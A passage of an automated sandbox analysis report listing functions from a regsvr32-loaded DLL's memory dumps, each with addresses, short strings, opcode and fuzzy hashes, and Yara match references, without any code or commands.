Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015388 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

2d, xrefs: 0000000180015418

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2d
API String ID: 0-3866551247
Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800250CC Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

ZF{;, xrefs: 0000000180025218

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ZF{;
API String ID: 0-2351138993
Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011834 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

o^, xrefs: 00000001800118C1

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: o^
API String ID: 0-3380573087
Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017CE4 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

8N, xrefs: 0000000180017DB3

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 8N
API String ID: 0-1657423088
Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002178 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

J3n, xrefs: 00000001800021BA

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: J3n
API String ID: 0-3694000235
Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001F7C0 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

c&A, xrefs: 000000018001F817

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: c&A
API String ID: 0-649646960
Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800029BC Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

(3, xrefs: 0000000180002ABA

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: (3
API String ID: 0-2570504824
Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002C7B4 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

[r\^, xrefs: 000000018002C8A4

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: [r\^
API String ID: 0-4041245994
Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019FDC Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

#X, xrefs: 000000018001A072

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X
API String ID: 0-1684620495
Opcode ID: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
Instruction ID: c074d48008b4f0de6335b08329d09b3dcf7b4425e670a70b5eb694557c772c54
Opcode Fuzzy Hash: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
Instruction Fuzzy Hash: CD31C27050074A8BCF48DF68C48A5DE7FA1BB68388F204619F85A96250D3B896A9CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002790 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

[[x, xrefs: 00000001800028BE

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: [[x
API String ID: 0-2553898450
Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E960 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

g\&, xrefs: 000000018001E9C1

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g\&
API String ID: 0-1994035986
Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000338C Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

#X, xrefs: 0000000180003431

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X
API String ID: 0-1684620495
Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800095DC Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

GfMu, xrefs: 0000000180009601

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: GfMu
API String ID: 0-241548529
Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F9E8 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

k|, xrefs: 000000018000FABD

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: k|
API String ID: 0-998972391
Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001D950 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

wz_, xrefs: 000000018001D9E9

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: wz_
API String ID: 0-2163964638
Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000580C Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

{?Q, xrefs: 00000001800058F9

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: {?Q
API String ID: 0-927583641
Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021510 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

|}6\, xrefs: 00000001800215C8

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: |}6\
API String ID: 0-3074799505
Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001FA38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

3&a, xrefs: 000000018001FB09

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 3&a
API String ID: 0-537350193
Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001435C Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

o0:X, xrefs: 000000018001438E

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: o0:X
API String ID: 0-645126758
Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020CFC Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

D4}, xrefs: 0000000180020DB4

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: D4}
API String ID: 0-491520632
Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EAA0C Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
String ID:
API String ID: 1583075380-0
Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
Instruction ID: bdedf4219e112e90008e65b1b92d7582f1431dc29f682dfed9b2a658f49c6f99
Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
Instruction Fuzzy Hash: 9AA17232B18BD246DB649F2696157FFA352AF85BC4F488135EE4D5BB69CE3CE5018300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EEB60 Relevance: .2, Instructions: 202COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
Instruction ID: e1c78c1f087c6736cce9262e91fe4abca52cf6e903e643c13781fd2da6998d80
Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
Instruction Fuzzy Hash: 2B71E672F18A964BD39CCF19EC516786696EBE4384F588435DD0ECABF4EA39F9008700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018598 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F7E0 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
Instruction ID: b4cc55b2ba55f7836136ac8b5ed3643aad821ec95d31101853fef74eb9d9cec8
Opcode Fuzzy Hash: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
Instruction Fuzzy Hash: FF51787090470DABDBA9CF64C4893EEBBF0FB48354F60806DE85697390DB749A85CB81

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001DBE8 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019300 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001CD38 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ace7ea2d26746cc3390ccab9d64ee1f2d7dc726b4390747d9cc592a488b98cf
Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
Opcode Fuzzy Hash: 2ace7ea2d26746cc3390ccab9d64ee1f2d7dc726b4390747d9cc592a488b98cf
Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800197A0 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
Instruction ID: dbb4fad0742d9b29c59b9a64f17438fc1cba9462e735a4e3b2d00d7b8da19945
Opcode Fuzzy Hash: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
Instruction Fuzzy Hash: 4C5192B490038E8FCB48CF69C84A5DE7BB1FB48358F104A19FC26A6250D7B4D665CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008AD8 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
Instruction ID: 08efbb833ea687ad733901112953304226336fcfa3581264405f9509991f6ff4
Opcode Fuzzy Hash: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
Instruction Fuzzy Hash: 6551BEB490074A8BCB48CF68D4875DE7FB0FB68398F20421DEC56AA250D3B496A5CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009F5C Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
Instruction ID: 52c1f8436ada09c5d91cc0f6a0e49c089501cc81ef075f7e28a52ff611ebfcf9
Opcode Fuzzy Hash: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
Instruction Fuzzy Hash: D351B3B190438E8FCB48DF68D98A5DE7BB0FB48348F104A19FC26A6250D3B4D664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F917 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
Instruction ID: 871f118089c9e262c63038bd4f0fd9666d89e9c6fa6f13266ea976bdce614408
Opcode Fuzzy Hash: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
Instruction Fuzzy Hash: CB41393190071DABDB95CFA4C8892EEBBF1FF44358F608159E852A7384DBB49685CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019E78 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
